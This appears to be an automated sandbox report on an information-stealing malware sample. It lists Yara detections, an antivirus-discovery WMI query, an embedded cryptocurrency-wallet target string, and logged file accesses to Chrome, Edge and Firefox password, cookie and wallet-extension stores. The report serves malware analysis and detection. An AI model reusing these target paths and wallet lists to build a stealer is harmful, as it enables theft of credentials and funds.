Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 23.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3287942560.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2465485176.0000000000721000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
